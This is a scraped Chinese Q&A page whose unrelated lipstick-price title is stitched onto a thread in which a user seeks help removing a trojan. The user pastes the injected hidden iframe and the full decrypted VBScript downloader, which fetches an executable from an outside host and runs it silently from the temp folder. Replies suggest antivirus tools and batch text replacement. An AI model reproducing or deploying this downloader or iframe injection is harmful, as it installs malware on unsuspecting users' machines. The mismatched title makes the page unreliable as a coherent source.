迪奥变色唇膏官网价:请高手一定要帮忙干掉木马!

来源:百度文库 编辑:中科新闻网 时间:2024/05/02 06:32:39
我也不知道打开了个什么网站,居然中了木马了,把我电脑里的所有的.htm文件和.asp文件全部在最后面添加了这段代码,
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
请高手和专家一定帮我解决问题,最快最简单的把所有文件的这段代码去掉
附上找到的木马文件代码,已经解密了的

<SCRIPT>var Words="<html>
<script language="VBScript">
on error resume next
dl = "http://www.ac66.cn/88/rpp.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Oh,my god! Goldsun[at]84823714</title>
</head><body>
<center>You DO it!</center>
</body></html>
";document.write(unescape(Words))</SCRIPT>

我还在里面找到这个网站http://www.ZerodayCn.com/
请大家一定要小心,强烈鄙视其恶劣行为,如果能够解决问题狂追加分数!!!!
这个不是广告程序,这个是木马,太TMD不要脸了,把我电脑里所有的.HTM文件和.ASP文件都在最后加了那段代码,请重点回答怎么恢复所有的文件

建议你用NOD32查一下,如果还是不行的话在用卡巴杀,如果还是杀不了的话,那就要装一下防火墙,再把<iframe>里的代码删除,注意一定要清楚干静了。用Advanced Find and Replace这个工具批量替换掉。干掉进程里的PP3。EXE要不好象不能删除,把Update。EXE文件移到别的地方去,把COMMAND。EXE文件删除。关闭系统的自动播放功能。防火墙这一关要把好。这样一般就没问题了。呵呵,我的一点心得。

最强的杀木马广告免费手工升级软件ewido4.0 anti-spyware不影响杀毒软件运行
http://www.grisoft.cz/softw/70/filedir/inst/ewido-setup_4.0.0.172b.exe
汉化补丁http://www.newhua.com/soft/41516.htm

我推荐用卡巴斯基6.0中文版,新版的加了预防保护和行为监控,特别是能查出广告程序,我想应该可以帮你这个问题吧。

我看重做个系统算了

请高手一定要帮忙干掉木马! 请高手帮忙清除木马 请各位高手帮忙,头疼的木马! 请反木马高手帮忙,谢谢! 怀疑是木马,请高手帮忙~ 硬件高手一定要帮忙 关于瑞星无法升级,请高手一定要帮忙啊!! 知道IP如何攻击别人,请高手一定要帮忙啊 知道IP如何攻击别人,请高手一定要帮忙啊 请大家一定要帮忙